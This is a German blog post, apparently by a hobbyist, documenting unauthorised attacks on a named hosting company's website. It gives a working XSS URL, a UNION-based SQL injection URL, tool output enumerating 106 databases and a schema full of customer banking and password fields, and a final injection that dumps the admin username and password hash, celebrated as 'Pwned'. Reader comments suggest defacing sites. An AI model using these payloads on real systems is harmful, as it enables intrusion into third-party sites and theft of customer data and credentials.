XSS & SQL-Injection @ Server-Crew.com

Hab heut nach langer Zeit mal wieder eine SQL Injection durchgefuehrt, drauf gestoßen bin ich durch KoC seinem 1337 XSSed Profil.

Geht um die Seite Server-Crew.com – hier mal eine XSS Luecke:

http://server-crew.com/server-crew/index.php?show=<script>alert(1337)</script>

Dann dachte ich mir “wo ne XSS ist, wird auch nicht weit entfernt ne andere Vuln sein :P”, also paar Sekunden weiter gesucht und auf etwas gestoßen:

http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/version()-- f

Ausgabe:

5.0.32-Debian_7etch11

Nett. 🙂

Hab mir paar Dinge ausgeben lassen.. hab dann schnell gemerkt das dort einige DB’s sind. Daher nen Script benutzt (ich weiß, lame usw. Aber da ich die SQL Injection ja gefunden hab sollte das Script nur ein bisschen arbeit abnehmen ;))

Hier die Datenbanken:

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                 v4.0  |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|
 
[+] URL:http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: gcp
	User: [email protected]
	Version: 5.0.32-Debian_7etch11
[+] Showing all databases current user has access too!
[+] Number of Databases: 106
 
[0]confixx
[1]gcp
[2]mumble
[3]mysql
[4]tss_13
[5]tss_9
[6]usr_web0_1
[7]usr_web0_2
[8]usr_web0_3
[9]usr_web0_4
[10]usr_web0_6
[11]usr_web0_8
[12]usr_web10_1
[13]usr_web12_1
[14]usr_web13_1
[15]usr_web14_1
[16]usr_web16_1
[17]usr_web17_1
[18]usr_web19_1
[19]usr_web19_2
[20]usr_web19_3
[21]usr_web19_4
[22]usr_web19_5
[23]usr_web1_1
[24]usr_web1_10
[25]usr_web1_11
[26]usr_web1_2
[27]usr_web1_3
[28]usr_web1_4
[29]usr_web1_5
[30]usr_web1_6
[31]usr_web1_7
[32]usr_web1_8
[33]usr_web1_9
[34]usr_web20_1
[35]usr_web21_1
[36]usr_web21_2
[37]usr_web21_3
[38]usr_web21_4
[39]usr_web21_5
[40]usr_web22_1
[41]usr_web23_1
[42]usr_web24_1
[43]usr_web26_1
[44]usr_web26_2
[45]usr_web28_1
[46]usr_web28_2
[47]usr_web29_1
[48]usr_web29_3
[49]usr_web2_1
[50]usr_web30_1
[51]usr_web30_2
[52]usr_web30_3
[53]usr_web30_4
[54]usr_web30_5
[55]usr_web31_1
[56]usr_web32_1
[57]usr_web33_1
[58]usr_web34_1
[59]usr_web34_2
[60]usr_web35_1
[61]usr_web37_1
[62]usr_web39_1
[63]usr_web39_2
[64]usr_web39_3
[65]usr_web39_4
[66]usr_web39_5
[67]usr_web39_6
[68]usr_web39_7
[69]usr_web3_1
[70]usr_web40_1
[71]usr_web40_2
[72]usr_web41_1
[73]usr_web41_2
[74]usr_web41_3
[75]usr_web43_1
[76]usr_web43_2
[77]usr_web44_1
[78]usr_web44_2
[79]usr_web46_1
[80]usr_web46_2
[81]usr_web47_1
[82]usr_web47_2
[83]usr_web47_3
[84]usr_web48_1
[85]usr_web49_1
[86]usr_web50_1
[87]usr_web50_2
[88]usr_web50_3
[89]usr_web50_4
[90]usr_web52_1
[91]usr_web52_2
[92]usr_web53_1
[93]usr_web54_1
[94]usr_web5_1
[95]usr_web5_2
[96]usr_web62_1
[97]usr_web62_2
[98]usr_web67_1
[99]usr_web8_1
[100]usr_web9_1
[101]usr_web9_2
[102]usr_web9_3
[103]usr_web9_4
[104]usr_web9_5
[105]usr_web9_6

Wer benutzt normalerweise “User: [email protected]“? Ist das nicht ein Sicherheitsrisiko? Anstatt das man nen eigenen User fuer die Page erstellt, alles ueber root machen?!

Doof.

Hier die Tabellen & Columns von der gcp DB:

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                 v4.0  |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                 v4.0  |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|
 
[+] URL:http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: gcp
	User: [email protected]
	Version: 5.0.32-Debian_7etch11
[+] Showing Tables & Columns from database "gcp"
[+] Number of Tables: 91
 
[Database]: gcp
[Table: Columns]
[0]host_accounts: host_id,server_id,clan_id,insystem,aktiv,suspend,remove,passwd,mysql_pw,hd_quota,base_host,traffic,error,webalizer,auto_pay
[1]host_application: app_id,app_status,app_on_server,port_id,server_id,server_ip,maxplayers,server_type,ftp_passwd,ftp_login,quota,standby,game,game_group,server_type2,maxusers,webdownload,app_load,app_load_new,error_status,server_start,first_use,to_restart
[2]host_billing_accounts: account_id,account_name,account_owner,account_number,bank_number,account_currency,account_type,account_saldo
[3]host_billing_bills: bill_id,bill_customer,bill_date,bill_due_date,bill_content,bill_amount,bill_payment,bill_tax,bill_status,bill_payment_status
[4]host_billing_bills_orders: bill_id,order_id
[5]host_billing_imports: import_id,import_name,import_type,import_field_sep,import_field_start,import_field_posting_text,import_field_saldo,import_field_account,import_field_amount,import_field_date,import_field_date_format,import_field_currency,import_field_reason1,import_field_reason2,import_field_reason3,import_field_reason4,import_field_reason5
[6]host_billing_reminder: reminder_id,user_id,content,reminder_mail,reminder_post,reminder_amount
[7]host_billing_to_export: bill_id,exp_mail,exp_post,exp_print,exp_billing,exp_ec,exp_cc,exp_edit,exp_cancel,exp_delete
[8]host_billing_transactions: transaction_id,transaction_date,transaction_currency,transaction_amount,transaction_account,transaction_reason,transaction_posting_text,transaction_bank_account,transaction_key,transaction_hide,transaction_customer,transaction_bill,transaction_ignore,transaction_special,transaction_credit,transaction_credit_export,transaction_credit_id
[9]host_errors: error_id,server_id,error_cat,error_typ,error_msg,time
[10]host_events: event_id,server_id,event_typ,error_type,event_times,solved,target,error_id,content,content_show_user,modul,modul_id,time_start,time_last,time_solved,event_user,user_id,rep,process_id
[11]host_gameserver: gs_id,gs_status,gs_on_server,port_id,server_id,server_ip,maxplayers,server_type,ftp_passwd,standby,game,game_group,server_type2,maxusers,gs_load,gs_load_new,error_status,server_start,quota,webdownload,first_use,to_restart,timeserver,timeserver_last_check,timeserver_time_empty
[12]host_gs_admins: user_id,master,software,kunden,sources,join_iface,zahlungen,support,server,accounting_admin,accounting_view,accounting_edit,accounting_bill,support_server,support_kunden,events,news,notes1,notes2,newsletter
[13]host_gs_admins_notify: user_id,event_id,notify_status
[14]host_gs_aktuell: gs_id,game_id,mod_id,config_id,copy_config,modul_id,modul,process_id
[15]host_gs_checks: check_name,check_mode,check_value,check_type,modul_id,modul
[16]host_gs_config_file_defaults: config_file,config_group,os,text,mod_id,plugin_id,imp,parts_order
[17]host_gs_config_files: config_file,file,vars,game_id,mod_id,plugin_id,use_sections,section_start,section_end,section_num,filter_double
[18]host_gs_config_files_regexp: regexp_id,config_id,regexp_order,pattern,split,name,dels,imp
[19]host_gs_configs: gs_id,config_id,game_id,mod_id,name,info,last_change,modul_id,modul,process_id
[20]host_gs_dependency: dep_id,software_id,game_id,mod_id,plugin_id,version,typ,imp
[21]host_gs_games: game_id,game,game_name,game_group,default_port,port_offset,qport,qport_offset,qstat_opt,aktiv
[22]host_gs_installed: gs_id,game_id,mod_id,plugin_id,version,modul_id,process_id,modul,autoupdate
[23]host_gs_layout: page_id,mod_id,game_id,page_order,imp
[24]host_gs_layout_field_defaults: field_id,page_id,field_default,text_default,imp
[25]host_gs_layout_field_script: page_id,field_id,script,imp
[26]host_gs_layout_field_text: field_id,kommentar,imp
[27]host_gs_layout_field_values: field_id,gs_id,value,text,config_id,value_key
[28]host_gs_layout_field_vars: field_id,var,value,imp,var_key
[29]host_gs_layout_fields: field_id,page_id,field_os,mod_id,plugin_id,field_desc,name,field_regexp,field_mode,count,config_id,field_group,size,field_type,split,field_order,real_name,script,min,max,step,syntax,einheit,force_enter,default_enter,runtime_replace
[30]host_gs_layout_fields_check: field_id,check_name,check_console_send,check_console_recv,check_console_recv_pos,check_qstat_var,check_plugin_name,check_reaction_nostart,check_reaction_stop,check_reaction_suspend,check_reaction_notify_customer
[31]host_gs_layout_pages: page_id,name,page_type,php_file,aktiv,dir,info,script,imp_id
[32]host_gs_mappool: map_id,map_name,map_datum,map_cat,map_mod,map_win,map_linux,map_comment,map_os
[33]host_gs_mappool_cats: cat_id,mod_id,cat_name,cat_short
[34]host_gs_mappool_files: map_id,files,file_win,file_linux
[35]host_gs_mappool_installed: map_id,gs_id,mod_id,modul,modul_id
[36]host_gs_mods: mod_id,game_id,mod,mod_name,executable,executable_win,params,params_win,standartmap,gamedir,gamedir_win,mapdir,mapdir_win,logdir,logdir_win,execdir,execdir_win,aktiv,webcache,webcache_win
[37]host_gs_plugins: plugin_id,mod_id,game_id,plugin,plugin_name,plugin_typ,aktiv
[38]host_gs_server: server_id,server_ip,ftp_user,ftp_passwd,location,source_server,short_desc,load_max,load_act,os,content_url,ip_start,ip_end,error_status,arch,webdownload_url
[39]host_gs_server_software: server_id,modul
[40]host_gs_software: software_id,game_id,mod_id,plugin_id,version,standart_mods,standart_plugins,extract_dir,remove_path,kommentar,extract_dir_win,remove_path_win,aktiv,install_mode
[41]host_gs_users: gs_id,user_id,admin,config,ftp,user_game,stop,show_varnames
[42]host_host_stats: up,lastupdate,bin,bout,cpu,load1,load2,load3,ram,swap,procs_run,procs_sleep,temp1,temp2,temp3,temp4,fan1,fan2,fan3,fan4,server_id
[43]host_ips: ip_id,ip,ip1,ip2,ip3,ip4,server_id
[44]host_jobs: job_id,pid,job_type,job_server,job_status,prozent,name,job_daten,entered,started
[45]host_kunden: user_id,aktiv,k_alt,k_ansprache,k_vorname,k_nachname,k_strasse,k_plz,k_ort,k_land,k_geburtsdatum,k_tele,k_handy,k_fax,k_bank_inhaber,k_bank_kto_nr,k_bank_blz,k_bank_name,k_bank_zahlung,k_info,paypal_email,bill_tax,bill_post,bill_email_send,bill_text,bill_email
[46]host_kunden_bestellungen: bestellungs_id,user_id,produkt_id,tarif_id,features,bestell_time,erstfreischalt_zeit,kuendigungs_zeit,rechnungs_zeit,sponsoring,freigeschaltet,zahlungs_status,abrechnungsraum,letzte_rechnung,new,new_time,tarif_id_new,features_new,abrechnungsraum_new,tarif_id_set,features_set,abrechnungsraum_set,contract_term,first_bill,individual_monthly_price,individual_price_setup,individual_price_setup_set,individual_monthly_price_set,produkt_id_set,next_set,individual_price_setup_new,individual_monthly_price_new,produkt_id_new,order_ip
[47]host_kunden_bestellungen_features: bestell_id,feature_id,feature_status,setting
[48]host_kunden_bestellungen_indiv: bestell_id,temp_id,settings,status
[49]host_kunden_bestellungen_module: bestellungs_id,modul,modul_id,modul_nocheck,feature_id
[50]host_kunden_bestellungen_old: bestellungs_id,user_id,produkt_id,tarif_id,features,more_data,bemerkung,bestell_time,erstfreischalt_zeit,kuendigungs_zeit,freigeschaltet,zahlungs_status,abrechnungsraum
[51]host_kunden_konto: kunden_id,kontostand,last_change
[52]host_kunden_konto_zahlungen: zahlungs_id,kunden_id,betrag,typ,zweck,bemerkung,zeit,removed,rechnungs_id
[53]host_kunden_rechnungen: rechnungs_id,kunden_id,datum,rechnung,bezahlt,time,mail_send
[54]host_mail_queue: mail_id,mail_date,mail_to,mail_header,mail_subject,mail_body,event_id,mail_last_try
[55]host_module_checks: modul_id,modul,check_name,check_mode,check_value,check_type
[56]host_module_info_text: user_id,modul,modul_id,info_date,info_subject,info_text
[57]host_module_settings: server_id,setting,value,modul
[58]host_module_users: user_id,modul,modul_id,user_setting,user_value
[59]host_mysql: mysql_id,host_id,server_id,new,del
[60]host_news: news_id,user_id,news_datum,news_titel,news_text,news_force,news_public,news_replies
[61]host_news_com: com_id,news_id,com_datum,com_user,com_text,com_ip
[62]host_news_links: link_id,news_id,link_url,link_name
[63]host_php_ini: host_id,ini_var,ini_val
[64]host_produkt_feature_sets: feature_grp,feature_input,feature_display,feature_setting
[65]host_produkt_features: feature_id,tarif_id,feature_grp,feature_name,feature_preis,feature_preis_einmalig,feature_einstellung,feature_order,feature_status,feature_input
[66]host_produkt_tarife: tarif_id,produkt_id,tarif_name,tarif_desc,tarif_anzeigen,tarif_settings_show,tarif_order
[67]host_produkt_zusatz: zusatz_id,produkt_id,zusatz_text
[68]host_produkte: produkt_id,produkt_name,produkt_desc,produkt_games,produkt_anzeigen,produkt_grp,produkt_order
[69]host_server: server_id,server_ip,aktiv,host_space,template_acc,hosting,cluster,cluster_url
[70]host_sessions: session_id,user_id,ip,start,end,lang,session_server
[71]host_status_gameserver: gs_id,server_time,server_ip,server_port,server_qport,server_name,server_players,server_players_max,server_map,server_response,server_game,server_mod
[72]host_support_idents: ident_id,ident_user,ident_key,ident,ident2
[73]host_support_logs: log_id,log_type,log_key,log_date,log_type_id,log_user_id,log_subject
[74]host_support_logs_text: log_id,log_text
[75]host_support_notes: note_id,note_date,note_admin,note_text,note_key,note_todo,note_todo_status,note_todo_admin,note_todo_date,note_todo_date_done
[76]host_support_sessions: chat_id,user_id,time_start,time_end,chat_auth,chat_type,support_cat,user_ident,support_status,last_change,im_status
[77]host_support_sessions_supporters: user_id,login_key,last_online,online_since,time_last,user_status,online_status,last_change,admin_ip,admin_host
[78]host_support_sessions_text: msg_id,chat_id,user_ident,msg_time,msg_text
[79]host_support_sessions_users: chat_id,user_ident,user_id,user_ip,time_last,last_msg,user_name,user_status,user_admin,user_invis
[80]host_teamspeak: ts_id,ts_status,ts_load,port,server_id,process_id,server_desc,slots,codec_celp51,codec_celp63,codec_gsm148,codec_gsm164,codec_windowscelp52,codec_speex2150,codec_speex3950,codec_speex5950,codec_speex8000,codec_speex11000,codec_speex15000,codec_speex18200,codec_speex24600
[81]host_teamspeak_server: process_id,ts_status,server_id,server_ip,port_id,config_id,config_id_global,max_servers,max_slots,ftp_passwd,mysql_passwd,first_start,to_restart,server_start
[82]host_tickets: ticket_id,start,end,last,user_id,admin_id,replies,public,topic,rubrik,prioritaet,stat
[83]host_tickets_posts: post_id,ticket_id,user_id,post_time,post_ip,post_text
[84]host_tickets_rubriken: rubrik_id,rubrik_name
[85]host_todo: host_id,server_id,apache,mysql,php,ftp
[86]host_traffic: host_id,base_host,akt_traffic,ftp_traffic,cpmb,bezahlt
[87]host_traffic_ip: server_ip,zeit,bin,bout,hold
[88]host_updates: ident,version,datum
[89]host_users: user_id,username,user_password,user_actkey,user_newpasswd,user_level,user_last_login,user_last_ip
[90]host_users_details: user_id

Wenn wir nun unsere SQL Injection anpassen:

http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/concat_ws(0x3a,username,user_password)/**/FROM/**/gcp.host_users/**/LIMIT/**/0,1-- f

Dann ist unsere Ausgabe:

admin:97b6e1f38fe6c69d0057860f5e0e2105

Scheint aufm ersten Blick nen MD5 PW zu sein. Pwned?! Pwned! 😀

Najo, mehr werd ich da auch nicht machen, viel Spaß 😉

12 Replies to “XSS & SQL-Injection @ Server-Crew.com”

  1. Sollen ses halt defacen oder bla.. interessiert doch niemanden, sollen sie sich stolz fühlen.. 😮

  2. ok ich starte auf meinem Blog skynet jetzt ein projekt mit dem nammen sicheres inetenet im zuge dieses projekts werden sicherheits lüken gesucht und der admin informirt, wenn der nicht in der lage ist diese lücke zu schliesen defacen wir die seite und machen zo die user darauf aufmerksam 🙂
    was haltet ihr davon ??

  3. äh blöde anfängerfrage, aber was für ein admin passwort war das, für was? und was bringt mir ein mysql passwort allgemein, wenn der server ohnehin nur auf 127.0.0.1:3306 lauscht und ich von außen nicht dran komm?

Leave a Reply

Your email address will not be published.